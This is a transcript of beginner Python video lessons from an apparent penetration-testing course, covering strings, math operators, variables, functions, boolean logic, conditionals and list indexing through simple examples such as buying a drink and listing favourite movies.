One very big thing to point out: you do not have to be a developer to be successful in penetration testing. The important thing is that you understand what you're seeing and understand how to read code. If, when you come away from this module, you have a better understanding of how to read what you are seeing in code, you'll be much better off. By no means do you have to be a developer. I am still to this day nowhere near a developer level, and I am very, very successful in what I do. You don't have to be a developer. So the big takeaway here is to take very good notes, understand what you're seeing; if you need to watch a video multiple times in this section, absolutely, okay? Just make sure you understand everything in front of you, and understand that the lessons are going to build upon each other, and it should
all come together in the end, and you're going to get to see it over and over through the course, especially in the exploit development section where we write our own Python script. So I look forward to teaching you this module on Python, and look forward to seeing you in the next video.

Welcome to your first video on Python. So in this Python series we're going to cover a lot of different topics, and we're just going to build upon them slowly so that everything builds kind of upon the last lesson. So in this first lesson we're going to be talking about strings, and we're going to be working primarily in Python 3. So a quick thing to note is that my Kali interface might look a little bit different. I'm on my personal pentest machine here; the only reason I'm doing that is because when we get into the text editor, my text editor on the newer version of Kali would not let me edit my preferences very easily, so I went ahead and just went back to my machine that has an older text editor on it. So you can follow along completely step by step in your Kali, and you should be fine; I just wanted to make sure that the font size is good enough for the recording.

So from here, let's go ahead and make a new directory, and I'm just going to call this directory python, and then we're going to change directory into python. And the first thing we're going to do is we're going to gedit, and I'm just going to call this first.py. This will be our first Python script, and we're going to build on it. So the first thing we need to do is declare what is called a shebang. So that is a hash bang, like this, and we're just going to declare #!/bin/python3 here at the top. Now what does this do? This allows us to know, or Linux to know, when we run this... say we were to run this like python3 and then we just say first.py. If we run it like this, then Python interprets the hash here, which you're going to learn a little bit, as a comment, so all this is commented out; we don't have to worry about it. But let's say we
wanted to run this a different way; we wanted to say ./first.py. Then it would actually be interpreted here at the top. So Linux would go in here and read this; it would say, hey, I'm going to go ahead and look for /bin/python3. It's going to find python3 in /bin, because that's where it's stored, and then it's going to use that to execute Python, or this Python script here. So we have two ways of running it: we can either run it python3 first.py, or we can run it, as you've seen with some of our other scripts, with the ./ like this. So I always like to declare it at the top; it's not necessary if you're just going to type in python3, but I always like to do it.

So I'm going to give you some headers here. So I'm just going to put a comment in, and we're just going to say print string. And so the first thing we're going to do is print a string. Now in the very stereotypical lesson, the very first string that most people print is the hello world, so we're going to go ahead and just do that. So let's go ahead and print hello world, and we're going to do that by just typing in print, and then in parentheses with quotation we're going to say hello world, something like this, okay? And that's it. So what we can do here is we can just save this, and we can go ahead and give this a go. So what we'll do is we'll say python3, and then we could say first, and it'll auto-tab out to first.py, and you can see now that it wrote out hello world. So if we go tab up twice and go back to our gedit, we could see here that it ignored printing out anything here with the comment; it didn't interpret this, because this is a comment with the hash, and we just told it one instruction, which was to print hello world, and it did just that.

So the nice thing about strings is we could use double quotes or we could use single quotes, so we could say, sorry, hello world, like this. And we can also use multi-line strings, so I'm going to tab, or hit enter twice here, and we could say something along the lines
of print, and what if we have, like, a long quote? We could say something like this string runs, and then we can say multiple lines, like this, and we just put that with triple quotations, like this. And lastly we can do a little bit of what is called concatenation. We could say something like print this string, and then we'll want to put a space at the end here and end the quotation; then we could put a plus sign in here, and we could say something like awesome, and end that parenthesis. So with all this you're going to see that, okay, we can print hello world; it should print hello world, hello world, this string runs multiple lines, and this string is awesome, and it should be space awesome here because we included the space. Now you're going to notice, even though we put line breaks in for us, no line breaks are going to be printed; we'll talk about that here in one second. So let's save this and let's just run it. So we're going to go ahead and run python3 first.py, and everything looks as anticipated, right?

So I want to show you one thing. Let's tab up twice and let's put an ampersand at the end of this. Watch what this does: now we have access not only to our script here, but we can also run code as well. So as long as we save this, we can run the code and we don't have to keep exiting out back and forth. So let's say that we did want to put a line in between these two hello worlds. We've got this here; what we can do is we can print this, you can say something like a \n, like this, if I could type today, and we close this off, and you can put a little note next to it so you remember, and just say new line. So when you have that backslash n, that prints out a new line. So let's save that and just take a look at that, and there you go, you have a new line put in there. So, quick and easy way to add a line in, or line break. And yeah, so here, very simple, very simple lesson, right? All we're doing is just learning how to print things, and we're dealing with strings. So even if you want to go in and build upon this,
you can add comments in for yourself to make this easier. So you can come in here and say double quotes, you could say single quotes, and then you can come in here and say triple quote for multi-line, right? And this way you know kind of what everything is doing. This one, you could say here, we can also concatenate; I don't know if I spelled that correctly, but I'm hoping I did. So that's really it for this lesson; I just wanted to cover the basics. So in the next lesson we're going to start talking about math, and the math that Python can do, and again we're just going to continue to build upon this. So I'll catch you over in the next lesson.

All right, let's talk math. So the nice thing about Python is that right off the bat it has a built-in math interpreter. So what we can use it for is addition, subtraction, multiplication, division, etc. We could throw numbers at it and it'll do calculations for us. So let's take a look at what that actually looks like. So I'm going to go ahead and gedit; we'll call this math.py. You can call this whatever you'd like, by the way. I'm going to put the ampersand at the end again, and we'll just declare our python3 here, and then let's just call this math. So the nice thing about math is we can do a lot of different things; we're very flexible. So for example we can print 50 + 50, and here we're just adding, right? So let's take a look at what this looks like. We go here and we just say python3 math.py, and you can see that it prints out a hundred. Now we can keep doing this for all sorts of different things, right? We can do 50 - 50; we would expect zero here, right? And we can do print 50 * 50, and we can also do print 50 / 50, and divide. So I'm going to give you a chance to catch up here; I typed that very fast. I also have notes that I'm looking at, so a little bit of an unfair advantage. But so when we see these, and we save this, and we run it, we're expecting everything to interpret just the way it did. So you see 100, 0, 2500, and then this
1.0, which we'll get into in just a little bit as to why it's coming out in a 1.0 format. But so we have this here, and we can also do some interesting things. Like, let's do something fun: let's do print 50 + 50 - 50 * 50 / 50. And what do you think this is going to do? Our good old friend PEMDAS, if you remember that from math class. So try it one more time, see what number pops out: pops out 50. So it also does more complex equations as well.

So there's a few other things that I want to show you in the math section. And another thing to note, I know I've already stressed this before, and I'm going to keep stressing it: make sure you take good notes. This is absolutely going to feel overwhelming; I'm going to throw a lot of things at you, especially with all the stuff that you're learning. Take good notes, have a good notebook, and make sure you're writing this all down, so then you can just go back and you can reference it. And from here on out, in the next video what we're going to do is we're going to make a script and we're just going to build upon it, and I'll just leave everything in that script so that way you can have a place for all of your notes as well.

So here, let's talk about a couple more things. So we can also do exponents. So let's say we want to do 50 to the 50th power; well, we just write it like this (50 ** 50), and now we have exponents here. Save it, run it really quick, and we get this very, very, very large number, right? We could just make this to the second power and make it a little bit simpler. We could also do this: so we do print, and we do 50 % 6. Now this is called a modulo. Let's take a look at what it does. So 50 is not divisible by 6, right? So what it does is it takes the number that is left over. So we do 50 divisible by 6, okay, 6 goes into it 8 times, and then it has a leftover number of 2, right? 6 times 8 is 48, leftover number 2.
So that's the modulo. What if we were to divide by a number here, and we said 50 / 6? What is that going to do to us? Well, we print that out, and you see it gives eight point three three three three four. Perfect, that's fine. What if we just want a number without any leftovers? Well, we can do something like this: you can do 50 // 6, and then we'll just say no leftovers here, okay? So I'm going to give you a second to catch up. We'll hit save on this, and we're going to go ahead and run it, and you can see that it just gives us the eight; it doesn't give us that leftover of two that we had and put it into fraction form here, or decimal form here. So we have different ways that we can manipulate these numbers, and we can do math on the fly. There's also math modules, which we haven't gotten to (the modules) yet, but there are additional math items that we can pull into this, like bringing in random numbers, for example, and other things that we can do more advanced calculations with in Python. But as a base it does quite a bit of items for us, and it is essentially a built-in calculator, so we can do quick math on the fly if we need to. So let's go ahead, and from here we're going to move on to the next video; we're going to start talking about variables and methods.

All right, so let's talk about variables and methods. So to do this we're going to make a new file. So let's do gedit, and we're going to call this one script.py, because in the last video I told you we're just going to start building off of these scripts, and we're just going to keep it in one script and keep it going. So let's gedit script.py; we'll do one more shebang here of #!/bin/python3, and then we're going to go ahead and just build this out. I'm going to drag this over just a little bit. So let's put another comment up here, and we'll just call this variables and methods, and let's define a variable. So let me show you what a variable looks like, and then we'll define what a variable really is. So let's start with a
quote, and you can pick your favorite quote here. We're just going to say something like all is fair in love and war, okay? So what's happening here is we are creating a variable of quote. Now, a variable, all you can think of a variable as is a placeholder. So instead of typing out all is fair in love and war, we can just call this placeholder at a later time, and it knows, hey, I'm going to call this information. So it's going to store this information inside of quote, and then later we just call quote and it'll print it out. So we can do something like print quote, and save this, and I forgot to ampersand, so excuse me, we're going to close it, and let's just run script.py, sorry, python3 script.py. You can see it says all is fair in love and war. So if we gedit this and add the ampersand now... so we defined what was in our variable here, which was this string, right? We've talked about strings; we put a string here as our quote, and we printed the quote. So if we didn't put the print in here, we can copy this and just delete it; if we save this and we go to print this, now there's nothing telling this to print. So we have quote, and we have a quote stored in our quote variable, but nothing instructing it to print. So we can leave the print back in there, just copy and paste it back, and now it'll print that quote.

Now we also have what are called methods, okay? So methods are basically functions that are available for a given object, okay? So don't worry too much about that description; that's a very dictionary-based description. Just think about what a method does. So I'll show you these methods here. So a method might look something like print quote, and then let's say we want to make quote upper. So in order to make it uppercase, all uppercase, we're just going to throw in this method of upper. So we just say .upper; if we were to save that and print it, look, now the text is all uppercase. And you can make a note in here if you want, and just say makes it uppercase. And we can copy
this, let's just copy this whole line like this, and let's paste a couple here. So we could also do something like lower for lowercase, or we could do something like title for title case, and we can make notes here of lowercase and title case, okay? And we save that, and when you print it, what do you think is going to happen here? So we're going to say all is fair in love and war, all is fair in love and war, and you can see in title case, not perfect; it's capitalizing the "and" here and the "in" and the "is", but it does capitalize every first letter, as it's instructed to do here. So these are methods. There's also other things that we can do. We can do something like, say we want to get the length of this quote; we want to know how many characters are inside the quote. We can do something like print len(quote), okay? We can just say save, and let's see what it prints out. Okay, so 28. Now it's 28 characters completely; if we were to count this all up, including the spaces, there's 28 characters there.

So let's make this a little bit more interesting, and let's talk a little bit more about math and bring that into it, and try to tie this all together with what we've learned so far. So let's use your name. Let's define a variable of your name, and we're going to set it as a string. So my name is Heath, so we'll just say this is a string, right? And let's also define your age. Now I'm 30, and we'll say this is what is called an int, or an integer, okay? And let's say what's your grade point average; my grade point average was 3.7, and this is what is called a float. Now what is the difference between an integer and a float? Well, an integer has no decimal point; a float does. So if I was 30 years and 27 days, I might be 30.1 years old, right? But if I only define it as an integer, if I say int 30, then that's going to define that this number is an integer and nothing else. Same thing with float: if we want to have the decimal point there, we can float a number and define it as, like, 3.7. So let's make more
sense of this. We can print out the integer of my age, and we can also print out the integer of, or we could say, 30.1, and let's see what happens, as we discussed here. So let's save this and let's just print out those two, and look, it takes 30.1 and makes it 30, and it takes the integer of age and makes it 30 as well. Now what if this is 30.9? What do you think is going to happen? Do you think it's going to round? In fact, it does not round. So you can see 30.9 still came out to 30 down here. It doesn't matter; it just takes this first number when we call an integer. So make sure that if you ever use integer, you know that it does not round.

So let's build upon this again. We could take a string now, and let's print out a string. We could say something like my name is, and then you could say + name. Make sure you add the space in there, right? And you can also say space and I am space, and then let's define an age. So if we try to put age in here, watch what happens. So we're going to say age, and we'll say space years old, and let's save this here, like this, and I'll give you a second to catch up. So again we're adding a space in the beginning, space at the end, space at the end here, just so that we have the syntax right, or else it's all going to bunch up together. So let's try to print this out, and you can see: cannot concatenate a string, not integer, to string. So this age here is sitting here as an integer; you can't concatenate a string with an integer. So how do we fix that? Well, what we can do here is we can actually put this into a string format. So we'll just say str(age), something like this, and save it, and now it makes it into a string. So similar to how we made something into an integer, and how we can make something into a float, we can also make something into a string. So if we come through here and we hit enter, you can see now that it works: my name is Heath and I am 30 years old. So a couple more things to note. What if we had something like our age, and you know, we got a year
older? Well, we can just say something like age += 1, and we could say print our age now. Watch what happens: age is now 31. Even up until that point, age has been 30, right? You see age coming through here; we're utilizing it in all three places. Now we print age down here and it's 31, because we have changed what is stored in the variable. So again, the variable here of age, we had 30 stored in it up until the instruction is called to add 1, plus equals 1. So we're just adding 1 to this age variable here; until then it stays 30. Now it is 31 until we change it again. So we can also do something along the lines of birthday = 1. So we have a value of birthday, and then we could say age += birthday, and then you're going to print your age again, and guess how old we're going to be: we are going to be 32. So it doesn't matter how you store it; you can do the plus equals here, or minus equals if you wanted to take away, and you can start incorporating your math into your variables, you can incorporate your variables into your strings, and you can start tying this all together.

So if you need to rewatch this to make more sense of it, that's absolutely fine. I'm going to harp one more time on this: take good notes, practice, practice, practice. This is stuff that can get overwhelming very quick, but hopefully I'm explaining it slow enough and you're getting it. If you're not getting it, please do re-watch the video, please take notes, and please utilize outside resources as well. I understand that I might not always be the best at teaching a particular subject, or sometimes it takes another person hearing it again from somebody else to see this. Coding is not necessarily easy, but once it clicks, it clicks, and a lot of it is just repetition. So that is it for this video; we've started to tie everything together now. From here we're going to move into what are called functions and build upon all of this, so I'll catch you over in the next video on functions.

All right, let's talk about
functions. Now functions are what I like to think of as mini programs. It's like this organized block of code that you define, and then you can call it later. It makes it a lot simpler than typing everything out. So it's a lot easier to visualize this than for me to just talk the theory of it. So let's go ahead and let's gedit our script again, our script.py, and then we're going to ampersand this one this time, and we should have our Python script from before. I'm just going to scroll down to the bottom, and I'm going to add in a new section here, and that section is just going to be called functions. So if we want to print out, we could print out a new line to kind of put this together, and then maybe when it's all said and done we can print a function, or make a function that just prints, and make it a little bit easier for us. So we're going to print a new line here, define functions, and maybe we'll just print out something that says here is an example function. So this is really just going to define the area. If we save it, while you're typing yours, I'm just going to print mine. So we'll python3 script.py, and you see we've got the new line here, and we see here is an example function, and we just start from here.

So let's take a look at a function using something that we've already done before. So we've got this section here, and we've got name, age, gpa. We're going to kind of reuse this, and this print my name is. So let's go ahead and reuse this. We're going to say function here, right? So we're going to define kind of a who am I. So we're going to define this, and then we're going to do two parentheses and then a colon here, so it's going to look like this. And what's important now is that we use indentation. Now we haven't had to talk about indentation to this point, but Python is very, very critical on utilizing indentation. If you don't use it in the right places, then your program will not function. So it's very important to know when to use indentation and to indent properly. So to
indent, I'm just going to tab here, and I'm going to redefine everything again. So we can just say name = Heath, and we can just say age = 30; typed that wrong there. And then we can just copy this print right here, so we don't have to type it all out again; just copy and paste it. And you can see: define who am I, and we're going to define in this function a name variable, an age variable, and then we're going to print this out. So if we were to just go ahead and save this and print this, nothing, nothing's here. All we've done so far is just define this function; we have done nothing to actually call it or do anything. And let's make a note here that this is a function, right? So when we get down towards the bottom, let's go ahead and just try to call this function. So to call a function, all we've got to say is who am I. Let's go ahead and save this, run it again, and look, it says my name is Heath and I am 30 years old. Well, what's happening here? Okay, so we're defining a set of things to do, right? This is a mini program, and inside this mini program we've defined our variables, and we defined an action here to take, which is printing out this string. So what it's doing is, when we call this, it's saying, hey, I'm going to go ahead and take all this, and I'm going to run this program and give you the result. Now what's important to note is whatever is stored in these variables here is only stored there inside the function. If we were to print age from the last video, it should still be 32, I do believe. So let's print, and you'll see it's 32.
even though we declared age up here as 30 that only lives inside this function so i'm going to go ahead and delete this so again everything is living inside this function and it's a mini little program that we have here and we just call it at a later time so let's go ahead and build out another function and we can kind of start to make sense of this so let's start with adding what are called parameters and we'll just do adding parameters here so let's make a function and this function is called add 100 like this okay and then the parameter i'm going to actually add inside instead of giving empty parentheses i'm going to add in something called num it's just going to be for number and then we're going to go ahead and use our colon hit enter do a tab and then what i want to do is i want to print number plus 100. so what am i doing here i'm taking a number and i'm adding 100 to it so my function of adding 100 makes logical sense okay so what's going to happen then if i say add 100 and then i specify a number in the parameter well i'm going to say what if i want to add 100 to 100 well then i should in theory print out 200 right and there you go we have successfully printed out 200. so we can build upon this even more so what if we want to use multiple parameters okay let's say we want to let's do multiple parameters and we want to define an add function we're just going to make an ad even though it's built into python we're going to make our own so we're just going to say add x and y so now we have two parameters here okay we're going to add our colon make sure we indent and then we're just going to say print x plus y now if we go in and we add 7 and 7 we should get 14. and there's 14. 
so hopefully this is starting to make sense all we're doing is building these mini programs and we can have no parameters as we saw up here we can have single parameters or multiple parameters depending on what we need so let's go ahead and build a couple more out just to make sense of it so what if we wanted to define multiply we'll just say x y again what do you think that's going to look like well instead of saying print what if we say return i'm going to throw something new at you i'm going to say return x and y okay now what happens if i call multiply and i say 7 7 again what happens here let's go ahead and save it well nothing happened we're not printing out to the screen all we're doing is returning so when i'm pulling this multiply in it's returning a certain number so i'm calling it here and it's saying hey 7 times 7 that's 49 but i have no idea what you want me to do with it now i could say print multiply here and then we can see what happens and now you see it's 49. so the return feature just allows us to return the number that is back to us right we don't have to always print it out if we don't want to we can store it for later so that's what we can do here so we don't always have to print it we can we can return the number and then call it later so that's one way of looking at it let's do one more how about we define square root and we only take one number here so how would we do the square root of something well let's go ahead and just print out x and then we're going to do by 0.5 remember the exponent with two multiplications here and then we're doing the square root so we're going to take 0.5 instead of squared which would be 2 right so we're taking the square root 2.5 and let's take an easy one let's return the square root of 64. so let's say square root of 64. 
and see what happens and it returns 8 for us now we can make that integer if we want to and go from there but that's just a nice base example so lastly i mentioned that we can make a function for a new line because we've been sitting in here and we've been just typing print and i am slow at it i have to sit here and think about it and then i find the correct letters and this is how you print new line okay i'm not the best at it but what if instead we just did something like define new line and then we just put this here so then we can just call a new line from here on out we could say a new line and then when this prints it'll print out a new line and while it's the same kind of length ish of this we don't have to type in the special characters look for them we could even shorten this to like nl something like nl and then make it really simple and then we save time and this is where these programs come in and they save time so good example of a use of a function so i'm going to save this if you want to use this for moving forward and going on in the next videos absolutely welcome to so if you're following along go ahead and just leave your text editor open and i will catch you over in the next video as we start to talk about boolean expressions welcome back so now we're going to discuss what are called boolean expressions and we can go ahead and just type this right into our text file if you don't have your file open with g edit go ahead and get your script dot pi open and what we're going to do is we're going to just put in here boolean expressions and that when we say boolean expressions we can just think of this as true or false so let's go ahead and print our new subject line we're just going to call these boolean expressions and from here let's start defining those so let's say we have boolean expression 1. we'll just call the variable bull 1. 
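The functions section above, written out as a runnable script. This is an added example, not the course's own script.py: the function names, the module-level `age = 32` and the `age_after_calling_who_am_i()` check are mine, and the point it adds is that the local `age = 30` never leaks out of the function and that a function which only prints hands its caller `None`.

```python
# Added example (not from the course): function scope, parameters and
# print vs. return, as walked through in the functions section.

# Module-level variable, like the `age` set earlier in the course's script.
age = 32


def who_am_i():
    """No parameters: everything it needs is defined inside the function."""
    name = "Heath"
    age = 30  # local variable: shadows the module-level `age` only in here
    return "My name is " + name + " and I am " + str(age) + " years old."


def age_after_calling_who_am_i():
    """Calls who_am_i() and then reads `age`: still the module-level 32."""
    who_am_i()
    return age


def add_100(num):
    """One parameter: whatever number is passed in, plus 100."""
    return num + 100


def add(x, y):
    """Two parameters."""
    return x + y


def multiply_print(x, y):
    """The first version from the video: prints, so the caller gets None."""
    print(x * y)


def multiply(x, y):
    """Returns the product so the caller can store it or pass it along."""
    return x * y


def square_root(x):
    """** 0.5 is the same as taking the square root (** 2 would square)."""
    return x ** 0.5


def nl():
    """Short helper so the newline escape never has to be typed by hand."""
    print("\n")


if __name__ == "__main__":
    print(who_am_i())
    print(age_after_calling_who_am_i())     # 32, not 30
    print(add_100(100))                      # 200
    print(add(7, 7))                         # 14
    stored = multiply_print(7, 7)            # prints 49, stored is None
    print(stored)
    print(add_100(multiply(7, 7)))           # a returned value can be reused: 149
    nl()
    print(int(square_root(64)))              # 8
```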
Now let's just set that equal to True, okay? And let's give an example of that as well. Let's just say boolean two equals, let's say, three times three. Now what does 3 times 3 equal? Well, that equals 9. So we can say equals equals to mean something equals something, and so this number equals this number. So 3 times 3 is 9, which equals 9. So if we take this expression and we say 9 equals 9, it's going to return True. Let's do a couple more. So we could say boolean 3 equals False, and boolean 4 equals 3 times 3, and then we can say does not equal 9. Well, that's not true, right? So that's False. So if we were to print these all out, we could say print bool1, bool2, bool3 and bool4, okay? And let's also print the type so we know about this, so they say print type. And let's take a look at what this looks like. So once you have that all written out, go ahead and just save this and go ahead and run your file, and you can see that it came out exactly how we thought it would. So we've got four variables and they're all boolean expressions, right? So we've got True, this equals to True, this is False, and this is equal to False. So we see True, True, False, False when we print those all out. And then when we want to look at the type of the variable, so we say, hey, what's stored in here inside this variable? What's stored is a boolean. Now please do note that there is a difference between True and "True": one is a string and one is a boolean. So if you were to set boolean five, for example, to "True" and then you printed the type of boolean five, then you're going to get a different result here. You're going to see now that the type is a class of string. So, big difference here. I'm going to go ahead and just delete this. So this is just an overview of boolean expressions. We're going to use this later on, and you will see it again when we get into exploit development, but you're going to see certain things, especially when we get into loops as well. So once we start getting into looping and we talk about that, it'll make a little bit more sense. But you want to know sometimes if something is true or something is false, or, when we get into conditional statements, if something is true then do this, or if something is false, do this. We haven't gotten quite that far yet, but we need to introduce the concepts before we can build upon it. So what we're going to do in the next video is we're going to build upon these even more. We're going to take relational operators and these boolean expressions and kind of combine them and start building upon it, and then once we get this all put together it'll all start making sense. So for now, all you need to know is when I say boolean expression, all I'm thinking about is true or false. So we'll build upon that in later videos.

Okay, let's build upon where we just left off with the boolean expressions. So now let's talk about relational operators and boolean operators. So what do we mean when we say operator? Let's go ahead and just add a new section here, and we'll just say "relational and boolean operators". If you want, you can go ahead and just put a new line here; so remember, we specify a new line in a function. And let's say greater than. Let's define a variable called greater than, and let's just make that equal to seven is greater than five, okay? So we're using an operator here with the greater than symbol, right? And we're also using a boolean expression, because when we say 7 is greater than 5, well, that's going to come back with True. And we could say less than; we could say 5 is less than 7, and that's also going to return True. What about greater than or equal to? We can say 7 is greater than or equal to 7, and that's going to return True as well. And then if you can think of less than or equal to, it's going to be very similar: we say 7 less than or equal to 7, and that's also going to be True. So if we were to print all these out, which we don't have to, they're all going to return back True. So there's other things that we can add in here. What if we bring in multiple operators? For example, we could say test, and you can call this whatever you want. So what if we say 7 is greater than 5 and 5 is less than 7? So we see here that this is true and this is true; that would make this entire statement true. So we could say True here. If we were to say, let's just call this test and 2, we were to say 7 is greater than 5, which is true, and 5 is greater than 7, well, that's not true. So this whole statement is going to be False, because we're going to say and, and "and" is very important here, right? What if we were to say something like or, though? If we were to say, let's test out or, we could say 7 is greater than 5 or 5 is less than 7. Well, this is going to return True. And if we were to do the same thing as we did above, where we say test or 2, and we say 7 is greater than 5 or five is greater than seven (I forgot my parentheses here), this is also going to return True. Why? Because only one statement has to be true here for these both to be true. In the instance of and, both statements here have to be true in order for it to be true; if one of them becomes false, the whole thing becomes false. In the case of or, if both are true it's true, if one or the other is true then it's true; both have to be false for it to actually return False, okay? So you can print these out as well to test this out. The other thing that we can say is we could say something like test not. We can say something like not True, and guess what, not True is going to be False, and if we said not False then that'll be True. So these are the ones that can start to kind of get confusing. So again, my recommendation is to make good notes on this and then go out and study it. And there are true false charts; let's just see if we can Google one quickly. There are true false charts online. We could say "true false chart python" and go to images, and we can see truth tables is what they're called. So if A is true and B is true, then A and B are true. If A is false or true and B is false, then they're both false. False true is false, and false false is false. So in order to have a truth table for and, everything has to be true. So if we search truth tables, that might give us a better chart here, and then you get something sort of like this, where you have and, where you see true true is true; you have or, where true false is still true; and then xor, we don't have to worry about right now. So take good notes on these, make sure you understand them. We're going to continue to build upon them over time. Really, all you have to think about, though, is you have to think about boolean operators and these expressions, and the most important things to take away from this are not just the true and false but the greater than symbols, the less than symbols, all these different types of operators that we can utilize here, and that we can also utilize things such as and, or and not as well. So we're just adding more tools to our toolkit and more things to think about. Where Python is important when it comes to pen testing is not necessarily being able to develop, and I've said this before, I'm going to say it again: being able to read and understand what is going on is super important; being a developer, not as important. So as long as you see these things, and you see a True, or you see a statement like this when you're reading code, and you say, hey, I know that's a boolean operator, I know it's true or false, and I kind of understand the truth tables, right? So that's really what we're after here. So as long as you start getting this understanding and this comprehension, that's really what we're after. So from here we're going to move on and we're going to go into conditional statements, and that is where we get into something called if then else, and we'll have a little bit of fun with those. So I will catch you over in the next video.

Now we're moving on to conditional statements. Now, you could think of conditional statements as an if else scenario. For example, if you go to the store and you want to purchase a drink and the drink costs two
dollars. Well, if you have two dollars, you're going to be able to purchase that drink; if you don't have two dollars then you won't be able to purchase that drink. That is a condition. So the condition there is based on the amount of money you have. We can take these conditional statements and we can run if else; we could also run if, else if, else and build upon these. Now, it all makes sense when we start putting it together in our script here, so let's go ahead and just do that. Let's make a new line and let's make a comment here that says "conditional statements", and let's start with a conditional statement. So a conditional statement's going to start off looking like a function. So we'll say define, and here let's make the same scenario where we talked about the money and buying a drink. So we'll define drink, and we'll just say a parameter here of money, okay? And then let's indent, and let's say if money is greater than or equal to two (remember we talked about two dollars for this drink) then we're going to return "you've got yourself a drink". Now what if we don't have the money? So we could say else: if our money is not greater than or equal to two, then we're just going to return "no drink for you". Didn't mean to capitalize the O there, but I'm leaving it because I like it. So in this situation we have our condition set. Now again, if our money is equal to or greater than two, we're going to get a drink, and if not, we're not going to get a drink. So it could be anything else, right? So what we can do now is, since this is just returning and not printing anything, we can print out something like drink and then we specify the amount. So if we have three we should return one thing, and if we print drink here with only a dollar we should return another. So let's go ahead and save this script. And I didn't put this with an ampersand, so I'm going to close out and make sure I do that next time. And what we're going to do is we're just going to go ahead and python3 script.py, and you can see down here. We go back, and let me run the script with the ampersand. You can see that we did a drink of three, which we were expecting to return "you got yourself a drink", and we did a drink of one, which we're expecting to return "no drink for you". This happened just the way we thought it would.

So we can build upon these conditional statements. Let's talk about a different scenario with multiple parameters. Let's say that you are an adult, and here in the United States, if you're an adult and you want to have a drink of alcohol, that requires you to be of age, at 21. So in order to purchase alcohol you have to be, one, of age, and two, have money. Now if you don't drink, that's perfectly okay; this is just an example scenario. So here, let's say we wanted to buy alcohol. We have to meet that age requirement of 21 and we have to meet the requirement of money. Now, we could be in a situation where we meet the age requirement but we don't meet the money, or we could meet the money requirement but we don't meet the age requirement, or we could be in a situation where we don't meet the age requirement and we don't meet the money requirement. So let's set this up to think through this and how these scenarios could play out. So let's define alcohol here, and we need two parameters; we're going to say age and money. So the first statement here is going to be our leading if, and we're going to say if age is greater than or equal to 21, because we need that condition to be true, and our money is greater than or equal to five (so we'll say a drink costs five dollars), we're going to return "we're getting a drink", okay? Now, since we're going to have multiple conditions here, we're going to introduce something called else if. Else if here is written like this: e-l-i-f. So else if our age is greater than or equal to 21 and our money is less than five dollars, then let's return "come back with more money". We need another else here because we have another condition, right? So we're going to say what if our age is less than 21 and our money is greater than or equal to five? Well, we're going to return "nice try kid", because we're not old enough to purchase this drink. And then lastly, in our else scenario, if we are not meeting any of the conditions above, which means we won't have the age, we won't have the money, then we're just going to return "you're two", like a typo, sorry, "you're two poor and two young". So let's go ahead and run this a couple different times. So let's go ahead and print out alcohol, and we're going to give our two parameters; let's say 21 and 5. Print out again alcohol and let's give a parameter of 21 and 4, and then let's print out one last time alcohol, and we'll say that we are 20 and 4. So we should meet a few different conditions here, right? So at 21 and five we should return "we're getting a drink", at 21 and four we should return "come back with more money", and at 20 and four we should return "you're two poor and two young". Now if you want to add in a fourth condition here, or fourth print statement, and you want to return the "nice try kid", you're more than welcome to do that as well. So go ahead, hit ctrl s or save your script out, and then let's go ahead and run it, and you can see we return exactly where we thought we were going to: we're getting a drink, come back with more money, and too poor and too young. So this is it for conditional statements. Hopefully this makes sense. Again, our conditions are based on certain items, right? So money here, for an example: if we have the money, we're getting a drink; if we don't have the money, we're not getting a drink. And then we can build upon that; we can have multiple parameters here. So if we're not old enough to buy a drink, or we don't have enough money to buy a drink, or we don't meet any of these scenarios, different things can happen. What you need to be thinking about as a developer, programmer, or even writing these scripts is all the scenarios that could happen in these situations. You've got to think of the logic behind it. So when you're building out a script, you're building out your first program, you need to think logically: if I make an if statement or a conditional statement, what's the logic behind it? So a lot of times, for example in this scenario, we might have thought, okay, well, if I don't have the age or the money, okay, but you've got to think about what if I do have the age but not the money, or I do have the money but not the age. So you have to think through everything in your head and make sure that it's all clicking, and this just takes repetition and just sitting down. The best way is sitting down with a pen and paper and not writing this in code form, but just writing this in a sense that makes sense to you, thinking through it logically, and then writing it out in code. So from here we're going to go ahead and move on to lists in the next video. So once you're all caught up here, let's go ahead and move right over there.

Okay, now let's talk about lists. So lists are data structures. Now, these data structures are changeable; we can reorder them, put them in a list, right? So they're just a group of elements, and when you have this list, everything inside that list is called an item. And the best way to think of a list is to think that it lives in between brackets. You're going to see other things later on that look like a list, but it's not really a list because of how it's defined, and how we're going to define lists is because they live in brackets. Just like a string might have quotes around it, a list is going to have these brackets around it. So let's make a new line and let's go ahead and just do something along the lines of "lists", and we could just say something like "have brackets", like this, okay? So let's go ahead and make a list, and then we can kind of go from there. So let's define a list of your favorite movies. Now, you can put in whatever favorite movies you like in here, and I'm going to put in something like When Harry Met Sally, The Hangover, The Perks of Being a Wallflower. This is getting kind of long, so I'm actually going to move this over a little bit for us, and we'll say one more; let's pick four movies. We'll do The Exorcist, okay? And now we have this list. Again, lists just live in brackets. So we've got list item one, item two, item three and item four, okay? So let's go ahead and print these. So if we were to print out something like movies, and we said we wanted to print the first item out of movies, let's go ahead and try to print When Harry Met Sally. So we'll print the first item, so put a bracket around it just like this. We'll print it out and we'll see what happens. So let's save it, and what's it going to return for us? It's returning The Hangover. So item one is not item one as you see it. So when we talk about items, when we talk about numerical order here in Python, item one is actually going to be referred to as zero. So make a note here for yourself that this will return the second item. So if we wanted to return just When Harry Met Sally, we would actually put in movies zero, like this, and we could say "returns the first item in the list", okay? And we can save that, and let's go ahead and give it a go just to do proof of concept, and there you go. So remember that everything starts with zero and not one. So when you're thinking about things, let's think about them with zero as the beginning number. So let's go ahead and do a few more different prints. What's going to happen when we print out something like this? We'll say movies and we'll do one through three. Do you have a hunch? Let's go ahead and save it, print it out here, and it will take the list here starting at one and it'll end before three. So let's say we want to pull a couple items out. The first number that we're going to pull out is going to be the one that we want to start with, and the last number that we're going to pull out is going to be the number where we're going to stop. So The Exorcist is 3, but if we wanted to actually pull down The Exorcist we would have to pull down 4 here. So if we want to try to grab more than one thing on the list, we can absolutely do that, but we have to know where to stop. So now we incorporate The Exorcist here. Let's say we wanted to grab everything in a list, and we wanted to grab everything after a certain point, right? We could say something like movies one, like this, and then we should be able to grab every single thing, and that does pretty much the same thing here. So if we had 30 items here, it would grab all 30 items in this list. If we wanted to grab three items as we did before, we would do one, then you would just add three to that, to four, and it would stop. So, a little bit confusing; this takes a little bit to wrap your mind around, but the good thing here is that you take notes. You can make notes however you feel comfortable with, and these tricks should be useful for you. So let's try another thing. What if we said something like movies and we did this one in reverse? We 